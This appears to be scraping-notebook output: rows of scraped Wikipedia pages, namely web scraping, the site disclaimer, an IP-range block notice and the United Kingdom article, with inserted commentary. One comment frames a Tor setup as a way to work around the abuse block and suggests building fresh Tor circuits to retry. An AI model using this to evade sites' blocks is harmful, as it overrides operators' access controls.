forcing FareChase to stop selling software that allowed users to compare fares online if the American Airlines site was included. The airline argued that FareChase's searches trespassed on its servers when they collected the publicly available information. Southwest Airlines has also been a victim of web scraping practices, in cases involving FareChase and another company called Outtask. Although the decisions taken so far are not uniform, it is difficult to ignore an emerging pattern in which the courts appear prepared to protect proprietary content on commercial websites, thereby preventing it from being used without the consent of the site owners. However, the degree of protection for such content has not yet been settled.
It will depend on the type of access performed by the scrapers, the amount of information collected, and the degree to which these factors affect the website owner. A website administrator can use various techniques to stop or slow down scrapers' requests. Some of these techniques include: |
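The translated article above notes that site administrators use various techniques to stop or slow scrapers. On the scraper's side, a common corresponding courtesy is to check a site's robots.txt before fetching; below is a minimal sketch using Python's standard urllib.robotparser, with a placeholder site, paths, and user-agent string.
from urllib.robotparser import RobotFileParser
from urllib.parse import urljoin

base_url = "https://en.wikipedia.org/"          # example site
user_agent = "simple-scraper-demo/0.1"          # placeholder user-agent string

parser = RobotFileParser()
parser.set_url(urljoin(base_url, "/robots.txt"))
parser.read()   # fetches and parses the site's robots.txt

for path in ["/wiki/Web_scraping", "/w/index.php?action=edit"]:
    allowed = parser.can_fetch(user_agent, urljoin(base_url, path))
    print(f"{path}: {'allowed' if allowed else 'disallowed'} for {user_agent}")
can_fetch only reports what the site requests; honoring it, and rate-limiting requests, remains the scraper's responsibility.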
105 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wikipedia:General_disclaimer | Wikipedia makes no guarantee of validity Wikipedia is an online open-content collaborative encyclopedia; that is, a voluntary association of individuals and groups working to develop a common resource of human knowledge. The structure of the project allows anyone with an Internet connection to alter its content. Please be advised that nothing found here has necessarily been reviewed by people with the expertise required to provide you with complete, accurate, or reliable information. That is not to say that you will not find valuable and accurate information in Wikipedia; much of the time you will. However, Wikipedia cannot guarantee the validity of the information found here. The content of any given article may recently have been changed, vandalized, or altered by someone whose opinion does not correspond with the state of knowledge in the relevant fields. Note that most other encyclopedias and reference works also have disclaimers. Our active community of editors uses tools such as the Special:RecentChanges and Special:NewPages feeds to monitor new and changing content. However, Wikipedia is not uniformly peer reviewed; while readers may correct errors or engage in casual peer review, they have no legal duty to do so and thus all information read here is without any implied warranty of fitness for any purpose or use whatsoever. Even articles that have been vetted by informal peer review or featured article processes may later have been edited inappropriately, just before you view them. None of the contributors, sponsors, administrators, or anyone else connected with Wikipedia in any way whatsoever can be responsible for the appearance of any inaccurate or libelous information or for your use of the information contained in or linked from these web pages. Please make sure that you understand that the information provided here is being provided freely, and that no kind of agreement or contract is created between you and the owners or users of this site, the owners of the servers upon which it is housed, the individual Wikipedia contributors, any project administrators, sysops, or anyone else who is in any way connected with this project or sister projects subject to your claims against them directly. You are being granted a limited license to copy anything from this site; it does not create or imply any contractual or extracontractual liability on the part of Wikipedia or any of its agents, members, organizers, or other users. There is no agreement or understanding between you and Wikipedia regarding your use or modification of this information beyond the Creative Commons Attribution-Sharealike 4.0 Unported License (CC BY-SA) and the GNU Free Documentation License (GFDL); neither is anyone at Wikipedia responsible should someone change, edit, modify, or remove any information that you may post on Wikipedia or any of its associated projects. Any of the trademarks, service marks, collective marks, design rights, or similar rights that are mentioned, used, or cited in the articles of the Wikipedia encyclopedia are the property of their respective owners. Their use here does not imply that you may use them for any purpose other than for the same or a similar informational use as contemplated by the original authors of these Wikipedia articles under the CC BY-SA and GFDL licensing schemes. 
Unless otherwise stated, Wikipedia and Wikimedia sites are neither endorsed by, nor affiliated with, any of the holders of any such rights, and as such, Wikipedia cannot grant any rights to use any otherwise protected materials. Your use of any such or similar incorporeal property is at your own risk. Wikipedia contains material which may portray an identifiable person who is alive or recently-deceased. The use of images of living or recently-deceased individuals is, in some jurisdictions, restricted by laws pertaining to personality rights, independent from their copyright status. Before using these types of content, please ensure that you have the right to use it under the laws which apply in the circumstances of your intended use. You are solely responsible for ensuring that you do not infringe someone else's personality rights. Publication of information found in Wikipedia may be in violation of the laws of the country or jurisdiction from where you are viewing this information. The Wikipedia database is stored on servers in the United States of America, and is maintained in reference to the protections afforded under local and federal law. Laws in your country or jurisdiction may not protect or allow the same kinds of speech or distribution. Wikipedia does not encourage the violation of any laws, and cannot be responsible for any violations of such laws, should you link to this domain, or use, reproduce, or republish the information contained herein. If you need specific advice (for example, medical, legal, financial, or risk management), please seek a professional who is licensed or knowledgeable in that area. |
106 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/w/index.php?title=Web_scraping&action=edit§ion=6 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Web scraping. |
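Row 106 above is worth pausing on: the request succeeded, but the body that came back is an IP-range block notice rather than article text, which is exactly the situation the Tor-based setup in this notebook is meant to work around. Below is a minimal sketch, not part of the original pipeline, of how such rows could be flagged before they reach the cleaning regex; the looks_blocked helper and the marker phrases are assumptions chosen from the notice scraped above.

import requests
from bs4 import BeautifulSoup

# Hypothetical marker phrases taken from the block notice scraped in row 106.
BLOCK_MARKERS = (
    "has been blocked",
    "You do not have permission to edit this page",
    "globally blocked",
)

def looks_blocked(html_text):
    # Extract the visible text and check it against the assumed block markers.
    visible = BeautifulSoup(html_text, "html5lib").get_text(" ", strip=True)
    return any(marker in visible for marker in BLOCK_MARKERS)

# Sketch of usage: skip or log block notices instead of cleaning and storing them.
# resp = requests.get("https://en.wikipedia.org/wiki/Web_scraping", timeout=10)
# if resp.status_code in (403, 429) or looks_blocked(resp.text):
#     print("Blocked or rate-limited; consider building a fresh Tor circuit before retrying.")
# else:
#     pass  # hand resp.text to the existing cleaning regex / DataFrame step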
107 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/United_Kingdom | The United Kingdom of Great Britain and Northern Ireland, commonly known as the United Kingdom (UK) or Britain, m is a country in Northwestern Europe, off the coast of the continental mainland. 21 22 It comprises England, Scotland, Wales, and Northern Ireland. n 23 The UK includes the island of Great Britain, the north-eastern part of the island of Ireland, and most of the smaller islands within the British Isles. 24 Northern Ireland shares a land border with the Republic of Ireland; otherwise, the United Kingdom is surrounded by the Atlantic Ocean, the North Sea, the English Channel, the Celtic Sea, and the Irish Sea. The total area of the United Kingdom is 94,354 square miles (244,376 km2), e 12 with an estimated population of 67,596,281 people in 2022. 13 In 1707, the Kingdom of England (which included Wales) and the Kingdom of Scotland united under the Treaty of Union to create the Kingdom of Great Britain. The Acts of Union 1800 incorporated the Kingdom of Ireland to create the United Kingdom of Great Britain and Ireland in 1801. Most of Ireland seceded from the UK in 1922 as the Irish Free State, and the Royal and Parliamentary Titles Act 1927 created the present name. The UK became the first industrialised country and was the world's foremost power for the majority of the 19th and early 20th centuries, particularly during the "Pax Britannica" between 1815 and 1914. 25 26 At its height in the 1920s, the British Empire encompassed almost a quarter of the world's landmass and population, and was the largest empire in history. However, its involvement in the First World War and the Second World War damaged Britain's economic power and a global wave of decolonisation led to the independence of most British colonies. 27 28 29 British influence can be observed in the legal and political systems of many of its former colonies, and British culture remains globally influential, particularly in language, literature, music and sport. English is the world's most widely spoken language and the third-most spoken native language. 30 The United Kingdom is a constitutional monarchy and parliamentary democracy. o 32 The UK has three distinct jurisdictions: England and Wales, Scotland, and Northern Ireland. 33 Since 1999, Scotland, Wales and Northern Ireland have their own governments and parliaments which control various devolved matters. 34 The capital and largest city of both England and the United Kingdom is London, whose wider metropolitan area is the largest in Western Europe, with a population of 14.9 million. 35 The cities of Edinburgh, Cardiff, and Belfast are the national capitals of Scotland, Wales, and Northern Ireland, respectively. Other major cities include Birmingham, Manchester, Glasgow, Bristol, Liverpool, Sheffield, Newcastle and Leeds. The UK is a developed country and has the world's sixth-largest economy by nominal gross domestic product (GDP). It is a recognised nuclear state, and is ranked fourth globally in military expenditure. 36 37 The UK has been a permanent member of the UN Security Council since its first session in 1946. It is a member of the Commonwealth of Nations, Council of Europe, G7, OECD, NATO, Five Eyes, AUKUS and CPTPP. The Acts of Union 1707 declared that the Kingdom of England and Kingdom of Scotland were "United into One Kingdom by the Name of Great Britain". 
p 38 The term "United Kingdom" has occasionally been used as a description for the former Kingdom of Great Britain, although its official name from 1707 to 1800 was simply "Great Britain". 39 The Acts of Union 1800 united the kingdoms of Great Britain and Ireland in 1801, forming the United Kingdom of Great Britain and Ireland. Following the partition of Ireland and the independence of the Irish Free State in 1922, which left Northern Ireland as the only part of the island of Ireland within the United Kingdom, the name was changed in 1927 to the "United Kingdom of Great Britain and Northern Ireland". 40 Although the United Kingdom is a sovereign country, England, Scotland, Wales and Northern Ireland are also widely referred to as countries. 41 The UK Prime Minister's website has used the phrase "countries within a country" to describe the United Kingdom. 42 Some statistical summaries, such as those for the twelve NUTS 1 regions, refer to Scotland, Wales and Northern Ireland as "regions". 43 Northern Ireland is also referred to as a "province". 44 With regard to Northern Ireland, the descriptive name used "can be controversial, with the choice often revealing one's political preferences". 45 The term "Great Britain" conventionally refers to the island of Great Britain, or politically to England, Scotland and Wales in combination. 46 It is sometimes used as a loose synonym for the United Kingdom as a whole. 47 The word England is occasionally used incorrectly to refer to the United Kingdom as a whole, a mistake principally made by people from outside the UK. 48 The term "Britain" is used as a synonym for Great Britain, 49 50 but also sometimes for the United Kingdom. 51 50 Usage is mixed: the UK Government prefers to use the term "UK" rather than "Britain" or "British" on its website (except when referring to embassies), 52 while acknowledging that both terms refer to the United Kingdom and that elsewhere "British government" is used at least as frequently as "United Kingdom government". 53 The UK Permanent Committee on Geographical Names recognises "United Kingdom", "UK" and "U.K. as shortened and abbreviated geopolitical terms for the United Kingdom of Great Britain and Northern Ireland in its toponymic guidelines; it does not list "Britain" but notes that "it is only the one specific nominal term 'Great Britain' which invariably excludes Northern Ireland". 53 The BBC historically preferred to use "Britain" as shorthand only for Great Britain, though the present style guide does not take a position except that "Great Britain" excludes Northern Ireland. 54 The adjective "British" is commonly used to refer to matters relating to the United Kingdom and is used in law to refer to United Kingdom citizenship and matters to do with nationality. 55 q People of the United Kingdom use several different terms to describe their national identity and may identify themselves as being British, English, Scottish, Welsh, Northern Irish, or Irish; 58 or as having a combination of different national identities. 59 The official designation for a citizen of the United Kingdom is "British citizen". 53 Settlement by Cro-Magnons of what was to become the United Kingdom occurred in waves beginning by about 30,000 years ago. 60 The island has been continuously inhabited only since the last retreat of the ice around 11,500 years ago. By the end of the region's prehistoric period, the population is thought to have belonged largely to a culture termed Insular Celtic, comprising Brittonic Britain and Gaelic Ireland. 
61 The Roman conquest, beginning in 43 AD, and the 400 year rule of southern Britain, was followed by an invasion by Germanic Anglo-Saxon settlers, reducing the Brittonic area mainly to what was to become Wales, Cornwall and, until the latter stages of the Anglo-Saxon settlement, the Hen Ogledd (northern England and parts of southern Scotland). 62 Most of the region settled by the Anglo-Saxons became unified as the Kingdom of England in the 10th century. 63 Meanwhile, Gaelic-speakers in north-west Britain (with connections to the north-east of Ireland and traditionally supposed to have migrated from there in the 5th century) 64 united with the Picts to create the Kingdom of Scotland in the 9th century. 65 In 1066, the Normans invaded England from northern France. After conquering England, they seized large parts of Wales, conquered much of Ireland and were invited to settle in Scotland, bringing to each country feudalism on the Northern French model and Norman-French culture. 66 The Anglo-Norman ruling class greatly influenced, but eventually assimilated with, the local cultures. 67 Subsequent medieval English kings completed the conquest of Wales and tried unsuccessfully to annex Scotland. Asserting its independence in the 1320 Declaration of Arbroath, Scotland maintained its independence thereafter, albeit in near-constant conflict with England. In 1215 the Magna Carta was the first document to state that no government was above the law, that citizens have rights protecting them and that they were entitled to a fair trial. 68 The English monarchs, through inheritance of substantial territories in France and claims to the French crown, were also heavily involved in conflicts in France, most notably the Hundred Years' War, while the Kings of Scots were in an alliance with the French during this period. 69 Early modern Britain saw religious conflict resulting from the Reformation and the introduction of Protestant state churches in each country. 70 The English Reformation ushered in political, constitutional, social and cultural change in the 16th century and established the Church of England. Moreover, it defined a national identity for England and slowly, but profoundly, changed people's religious beliefs. 71 Wales was fully incorporated into the Kingdom of England, 72 and Ireland was constituted as a kingdom in personal union with the English crown. 73 In what was to become Northern Ireland, the lands of the independent Catholic Gaelic nobility were confiscated and given to Protestant settlers from England and Scotland. 74 England became a colonial and seafaring maritime power, with rich development of art, trade, commerce, industry, architecture, and science. 75 Elizabethan England represented the apogee of the English Renaissance and saw the flowering of great poetry, music and literature. 76 With the founding of the East India Company, other English joint-stock companies and institutions, England competed with Europe, and built a trading empire. 77 78 79 In 1603, the kingdoms of England, Scotland and Ireland were united in a personal union when James VI, King of Scots, inherited the crowns of England and Ireland and moved his court from Edinburgh to London; each country nevertheless remained a separate political entity and retained its separate political, legal, and religious institutions. 
80 In the mid 17th century, all three kingdoms were involved in a series of connected wars (including the English Civil War) which led to the temporary overthrow of the monarchy, with the execution of King Charles I, and the establishment of the short-lived unitary republic of the Commonwealth of England, Scotland and Ireland. 81 Although the monarchy was restored, the Interregnum along with the Glorious Revolution of 1688 and the subsequent Bill of Rights 1689 in England and Claim of Right Act 1689 in Scotland ensured that, unlike much of the rest of Europe, royal absolutism would not prevail, and a professed Catholic could never accede to the throne. The British constitution would develop on the basis of constitutional monarchy and the parliamentary system. 82 With the founding of the Royal Society in 1660, science was greatly encouraged. The founding of the Royal Society laid the foundations of modern experimental science. 83 During this period, particularly in England, the development of naval power and the interest in voyages of discovery led to the acquisition and settlement of overseas colonies, particularly in North America and the Caribbean. 84 Though previous attempts at uniting the two kingdoms within Great Britain in 1606, 1667, and 1689 had proved unsuccessful, the attempt initiated in 1705 led to the Treaty of Union of 1706 being agreed and ratified by both parliaments. On 1 May 1707, the Kingdom of Great Britain was formed, the result of the Acts of Union 1707. 85 In the 18th century, cabinet government developed under Robert Walpole, in practice the first prime minister (1721 1742). A series of Jacobite uprisings sought to remove the Protestant House of Hanover from the throne and restore the Catholic House of Stuart. The Jacobites were finally defeated at the Battle of Culloden in 1746, after which the Scottish Highlanders were forcibly assimilated into Scotland by revoking the feudal independence of clan chiefs. The British colonies in North America that broke away in the American War of Independence became the United States, recognised by Britain in 1783. British imperial ambition turned towards Asia, particularly to India. 86 British merchants played a leading part in the Atlantic slave trade, mainly between 1662 and 1807 when British or British-colonial slave ships transported nearly 3.3 million slaves from Africa. 87 The slaves were taken to work on plantations, principally in the Caribbean but also North America. 88 However, with pressure from the abolitionism movement, Parliament banned the trade in 1807, banned slavery in the British Empire in 1833, and Britain took a leading role in the movement to abolish slavery worldwide through the blockade of Africa and pressing other nations to end their trade with a series of treaties. 89 In 1800 the parliaments of Great Britain and Ireland each passed an Act of Union, uniting the two kingdoms and creating the United Kingdom of Great Britain and Ireland on 1 January 1801. 90 After the defeat of France at the end of the French Revolutionary Wars and Napoleonic Wars (1792 1815), the United Kingdom emerged as the principal naval and imperial power (with London the largest city in the world from about 1830). 91 Unchallenged at sea, British dominance was later described as Pax Britannica ("British Peace"), a period of relative peace among the great powers (1815 1914) during which the British Empire became the global hegemon and adopted the role of global policeman. 
92 93 By the time of the Great Exhibition of 1851, Britain was described as the "workshop of the world". 94 From 1853 to 1856, Britain took part in the Crimean War, allied with the Ottoman Empire against Tsarist Russia, 95 participating in the naval battles of the Baltic Sea known as the land War in the Gulf of Bothnia and the Gulf of Finland, among others. 96 Following the Indian Rebellion in 1857, the British government led by Lord Palmerston assumed direct rule over India. Alongside the formal control it exerted over its own colonies, British dominance of much of world trade meant that it effectively controlled the economies of regions such as East Asia and Latin America. 97 Throughout the Victorian era, political attitudes favoured free trade and laissez-faire policies. Beginning with the Great Reform Act in 1832, Parliament gradually widened the voting franchise, with the 1884 Reform Act championed by William Gladstone granting suffrage to a majority of males for the first time. The British population increased at a dramatic rate, accompanied by rapid urbanisation, causing significant social and economic stresses. 98 By the late 19th century, the Conservatives under Benjamin Disraeli and Lord Salisbury initiated a period of imperial expansion in Africa, maintained a policy of splendid isolation in Europe, and attempted to contain Russian influence in Afghanistan and Persia, in what came to be known as the Great Game. 99 During this time, Canada, Australia and New Zealand were granted self-governing dominion status. 100 At the turn of the century, Britain's industrial dominance became challenged by the German Empire and the United States. 101 The Edwardian era saw social reform and home rule for Ireland become important domestic issues, while the Labour Party emerged from an alliance of trade unions and small socialist groups in 1900, and suffragettes campaigned for women's right to vote. 102 Britain was one of the principal Allies that defeated the Central Powers in the First World War (1914 1918). Alongside their French, Russian and (after 1917) American counterparts, 103 British armed forces were engaged across much of the British Empire and in several regions of Europe, particularly on the Western Front. 104 The high fatalities of trench warfare caused the loss of much of a generation of men, with lasting social effects in the nation and a great disruption in the social order. Britain had suffered 2.5 million casualties and finished the war with a huge national debt. 104 The consequences of the war persuaded the government to expand the right to vote in national and local elections to all adult men and most adult women with the Representation of the People Act 1918. 104 After the war, Britain became a permanent member of the Executive Council of the League of Nations and received a mandate over a number of former German and Ottoman colonies. Under the leadership of David Lloyd George, the British Empire reached its greatest extent, covering a fifth of the world's land surface and a quarter of its population. 105 By the mid 1920s, most of the British population could listen to BBC radio programmes. 106 107 Experimental television broadcasts began in 1929 and the first scheduled BBC Television Service commenced in 1936. 108 The rise of Irish nationalism, and disputes within Ireland over the terms of Irish Home Rule, led eventually to the partition of the island in 1921. 
109 A period of conflict in what is now Northern Ireland occurred from June 1920 until June 1922 (see The Troubles in Ulster (1920 1922)). The Irish Free State became independent, initially with Dominion status in 1922, and unambiguously independent in 1931. Northern Ireland remained part of the United Kingdom. 110 The 1928 Equal Franchise Act gave women electoral equality with men in national elections. Strikes in the mid 1920s culminated in the General Strike of 1926, which ended in a victory for the government led by Stanley Baldwin. Britain had still not recovered from the effects of the First World War when the Great Depression (1929 1932) led to considerable unemployment and hardship in the old industrial areas, as well as political and social unrest with rising membership in communist and socialist parties. A coalition government was formed in 1931. 111 Nonetheless, "Britain was a very wealthy country, formidable in arms, ruthless in pursuit of its interests and sitting at the heart of a global production system. 112 After Nazi Germany invaded Poland in 1939, Britain entered the Second World War. Winston Churchill became prime minister and head of a coalition government in 1940. Despite the defeat of its European allies in the first year, Britain and its Empire continued the war against Germany. Churchill engaged industry, scientists and engineers to support the government and the military in the prosecution of the war effort. 112 In 1940, the Royal Air Force defeated the German Luftwaffe in the Battle of Britain. Urban areas suffered heavy bombing during the Blitz. The Grand Alliance of Britain, the United States and the Soviet Union formed in 1941, leading the Allies against the Axis powers. There were eventual hard-fought victories in the Battle of the Atlantic, the North Africa campaign and the Italian campaign. British forces played important roles in the Normandy landings of 1944 and the liberation of Europe. The British Army led the Burma campaign against Japan, and the British Pacific Fleet fought Japan at sea. British scientists contributed to the Manhattan Project whose task was to build an atomic weapon. 113 Once built, it was decided, with British consent, to use the weapon against Japan. 114 The wartime net losses in British national wealth amounted to 18.6% ( 4.595 billion) of the prewar wealth ( 24.68 billion), at 1938 prices. 115 The UK was one of the Big Three powers (along with the US and the Soviet Union) who met to plan the post-war world; 117 it drafted the Declaration by United Nations with the United States and became one of the five permanent members of the United Nations Security Council. It worked closely with the United States to establish the IMF, World Bank and NATO. 118 The war left the UK severely weakened and financially dependent on the Marshall Plan, 119 but it was spared the total war that devastated eastern Europe. 120 In the immediate post-war years, the Labour government under Clement Attlee initiated a radical programme of reforms, which significantly impacted British society in the following decades. 121 Major industries and public utilities were nationalised, a welfare state was established, and a comprehensive, publicly funded healthcare system, the National Health Service, was created. 122 The rise of nationalism in the colonies coincided with Britain's much-diminished economic position, so that a policy of decolonisation was unavoidable. Independence was granted to India and Pakistan in 1947. 
123 Over the next three decades, most colonies of the British Empire gained their independence, and many became members of the Commonwealth of Nations. 124 The UK was the third country to develop a nuclear weapons arsenal (with its first atomic bomb test, Operation Hurricane, in 1952), but the post-war limits of Britain's international role were illustrated by the Suez Crisis of 1956. The international spread of the English language ensured the continuing international influence of its literature and culture. 125 126 As a result of a shortage of workers in the 1950s, the government encouraged immigration from Commonwealth countries. In the following decades, the UK became a more multi-ethnic society. 127 Despite rising living standards in the late 1950s and 1960s, the UK's economic performance was less successful than many of its main competitors such as France, West Germany and Japan. The UK was the first democratic nation to lower its voting age to 18 in 1969. 128 In the decades-long process of European integration, the UK was a founding member of the Western European Union, established with the London and Paris Conferences in 1954. In 1960 the UK was one of the seven founding members of the European Free Trade Association (EFTA), but in 1973 it left to join the European Communities (EC). In a 1975 referendum 67% voted to stay in it. 129 When the EC became the European Union (EU) in 1992, the UK was one of the 12 founding member states. From the late 1960s, Northern Ireland suffered communal and paramilitary violence (sometimes affecting other parts of the UK) conventionally known as the Troubles. It is usually considered to have ended with the 1998 Belfast "Good Friday" Agreement. 130 Following a period of widespread economic slowdown and industrial strife in the 1970s, the Conservative government of the 1980s led by Margaret Thatcher initiated a radical policy of monetarism, deregulation, particularly of the financial sector (for example, the Big Bang in 1986) and labour markets, the sale of state-owned companies (privatisation), and the withdrawal of subsidies to others. 131 In 1982, Argentina invaded the British territories of South Georgia and the Falkland Islands, leading to the 10 week Falklands War in which Argentine forces were defeated. The inhabitants of the islands are predominantly descendants of British settlers, and strongly favour British sovereignty, expressed in a 2013 referendum. From 1984, the UK economy was helped by the inflow of substantial North Sea oil revenues. 132 Another British overseas territory, Gibraltar, ceded to Great Britain in the 1713 Treaty of Utrecht, 133 is a key military base for the UK. A referendum in 2002 on shared sovereignty with Spain was rejected by 98.97% of voters in the territory. Around the end of the 20th century, there were major changes to the governance of the UK with the establishment of devolved administrations for Scotland, Wales and Northern Ireland. 134 The statutory incorporation followed acceptance of the European Convention on Human Rights. The UK remained a great power with global diplomatic and military influence and a leading role in the United Nations and NATO. 135 The UK broadly supported the United States' approach to the "war on terror" in the early 21st century. 136 British troops fought in the War in Afghanistan, but controversy surrounded Britain's military deployment in Iraq, which saw the largest protest in British history demonstrating in opposition to the government led by Tony Blair. 
137 The 2008 global financial crisis severely affected the UK economy. 138 The Cameron Clegg coalition government of 2010 introduced austerity measures intended to tackle the substantial public deficits. 139 Studies have suggested that policy led to significant social disruption and suffering. 140 141 A referendum on Scottish independence in 2014 resulted in the Scottish electorate voting by 55.3 to 44.7% to remain part of the United Kingdom. 142 In 2016, 51.9 per cent of voters in the United Kingdom voted to leave the European Union. 143 The UK left the EU in 2020. 144 On 1 May 2021 the EU UK Trade and Cooperation Agreement came into force. 145 The COVID 19 pandemic had a severe impact on the UK's economy, caused major disruptions to education and had far-reaching impacts on society and politics in 2020 and 2021. 146 147 148 The United Kingdom was the first country in the world to use an approved COVID 19 vaccine, developing its own vaccine through a collaboration between Oxford University and AstraZeneca, which allowed the UK's vaccine rollout to be among the fastest in the world. 149 150 On 8 September 2022, Elizabeth II, the longest-living and longest-reigning British monarch, died at the age of 96. 151 Upon the Queen's death, her eldest child Charles, Prince of Wales, acceded to the British throne as Charles III. 152 The total area of the United Kingdom is approximately 94,354 square miles (244,376 km2), e 12 with a land area of 93,723 square miles (242,741 km2). 12 The country occupies the major part of the British Isles 153 archipelago and includes the island of Great Britain, the north-eastern one-sixth of the island of Ireland and some smaller surrounding islands. It lies between the North Atlantic Ocean and the North Sea with the southeast coast coming within 22 miles (35 km) of the coast of northern France, from which it is separated by the English Channel. 154 The Royal Greenwich Observatory in London was chosen as the defining point of the Prime Meridian 155 at the International Meridian Conference in 1884. 156 The United Kingdom lies between latitudes 49 and 61 N, and longitudes 9 W and 2 E. Northern Ireland shares a 224 mile (360 km) land boundary with the Republic of Ireland. 154 The coastline of Great Britain is 11,073 miles (17,820 km) long, 157 though measurements can vary greatly due to the coastline paradox. 158 It is connected to continental Europe by the Channel Tunnel, which at 31 miles (50 km) (24 miles (38 km) underwater) is the longest underwater tunnel in the world. 159 The UK contains four terrestrial ecoregions: Celtic broadleaf forests, English Lowlands beech forests, North Atlantic moist mixed forests, and Caledonian conifer forests. 160 The area of woodland in the UK in 2023 is estimated to be 3.25 million hectares, which represents 13% of the total land area in the UK. 161 Most of the United Kingdom has a temperate climate, with generally cool temperatures and plentiful rainfall all year round. 154 The temperature varies with the seasons seldom dropping below 0 C (32 F) or rising above 30 C (86 F). 162 Some parts, away from the coast, of upland England, Wales, Northern Ireland and most of Scotland, experience a subpolar oceanic climate (Cfc). Higher elevations in Scotland experience a continental subarctic climate (Dfc) and the mountains experience a tundra climate (ET). 163 The prevailing wind is from the southwest and bears frequent spells of mild and wet weather from the Atlantic Ocean, 154 although the eastern parts are mostly sheltered from this wind. 
Since the majority of the rain falls over the western regions, the eastern parts are the driest. Atlantic currents, warmed by the Gulf Stream, bring mild winters, especially in the west where winters are wet and even more so over high ground. Summers are warmest in the southeast of England and coolest in the north. Heavy snowfall can occur in winter and early spring on high ground, and occasionally settles to great depth away from the hills. 164 The average total annual sunshine in the United Kingdom is 1339.7 hours, which is just under 30% of the maximum possible. 165 The hours of sunshine vary from 1200 to about 1580 hours per year, and since 1996 the UK has been and still is receiving above the 1981 to 2010 average hours of sunshine. 166 Climate change has a serious impact on the country. A third of food price rise in 2023 is attributed to climate change. 167 As of 2022, the United Kingdom is ranked 2nd out of 180 countries in the Environmental Performance Index. 168 A law has been passed that UK greenhouse gas emissions will be net zero by 2050. 169 England accounts for 53 per cent of the UK, covering 50,350 square miles (130,395 km2). 170 Most of the country consists of lowland terrain, 171 with upland and mountainous terrain northwest of the Tees Exe line which roughly divides the UK into lowland and upland areas. Lowland areas include Cornwall, the New Forest, the South Downs and the Norfolk Broads. Upland areas include the Lake District, the Pennines, the Yorkshire Dales, Exmoor, and Dartmoor. The main rivers and estuaries are the Thames, Severn, and the Humber. England's highest mountain is Scafell Pike, at 978 metres (3,209 ft) in the Lake District; its largest island is the Isle of Wight. Scotland accounts for 32 per cent of the UK, covering 30,410 square miles (78,772 km2). 172 This includes nearly 800 islands, 173 notably the Hebrides, Orkney Islands and Shetland Islands. Scotland is the most mountainous constituent country of the UK, the Highlands to the north and west are the more rugged region containing the majority of Scotland's mountainous land, including the Cairngorms, Loch Lomond and The Trossachs and Ben Nevis which at 1,345 metres (4,413 ft) 174 is the highest point in the British Isles. 175 Wales accounts for less than 9 per cent of the UK, covering 8,020 square miles (20,779 km2). 176 Wales is mostly mountainous, though South Wales is less mountainous than North and mid Wales. The highest mountains in Wales are in Snowdonia and include Snowdon (Welsh: Yr Wyddfa) which, at 1,085 metres (3,560 ft), is the highest peak in Wales. 171 Wales has over 1,680 miles (2,704 kilometres) of coastline including the Pembrokeshire Coast. 157 Several islands lie off the Welsh mainland, the largest of which is Anglesey (Ynys M n). Northern Ireland, separated from Great Britain by the Irish Sea and North Channel, has an area of 5,470 square miles (14,160 km2) and is mostly hilly. It includes Lough Neagh which, at 150 square miles (388 km2), is the largest lake in the British Isles by area, 177 Lough Erne which has over 150 islands and the Giant's Causeway which is a World Heritage Site. The highest peak in Northern Ireland is Slieve Donard in the Mourne Mountains at 852 metres (2,795 ft). 171 The UK is a constitutional monarchy and a parliamentary democracy operating under the Westminster system, otherwise known as a "democratic parliamentary monarchy". 178 It is a centralised, unitary state 179 180 wherein the Parliament of the United Kingdom is sovereign. 
181 Parliament is made up of the elected House of Commons, the appointed House of Lords and the Crown (as personified by the monarch). r 184 The main business of parliament takes place in the two houses, 184 but royal assent is required for a bill to become an act of parliament (that is, statute law). 185 As a result of parliamentary sovereignty, the British constitution is uncodified, consisting mostly of disparate written sources, including parliamentary statutes, judge-made case law and international treaties, together with constitutional conventions. 186 Nevertheless, the Supreme Court recognises a number of principles underlying the British constitution, such as parliamentary sovereignty, the rule of law, democracy, and upholding international law. 187 King Charles III is the current monarch and head of state of the UK and of 14 other independent countries. These 15 countries are today referred to as "Commonwealth realms". The monarch is formally vested with all executive authority as the personal embodiment of the Crown and is ...fundamental to the law and working of government in the UK. 188 The disposition of such powers however, including those belonging to the royal prerogative, is generally exercised only on the advice of ministers of the Crown responsible to Parliament and thence to the electorate. Nevertheless, in the performance of official duties, the monarch has "the right to be consulted, the right to encourage, and the right to warn". 189 In addition, the monarch has a number of reserve powers at his disposal, albeit rarely used, to uphold responsible government and prevent constitutional crises. s For general elections (elections to the House of Commons), the UK is currently divided into 650 constituencies, each of which is represented by one member of Parliament (MP) elected by the first-past-the-post system. 191 MPs hold office for up to five years and must then stand for re-election if they wish to continue to be an MP. 191 The Conservative Party, colloquially known as the Tory Party or the Tories, and the Labour Party have been the dominant political parties in the UK since the 1920s, leading to the UK being described as a two-party system. However, since the 1920s other political parties have won seats in the House of Commons, although never more than the Conservatives or Labour. 192 The prime minister is the head of government in the 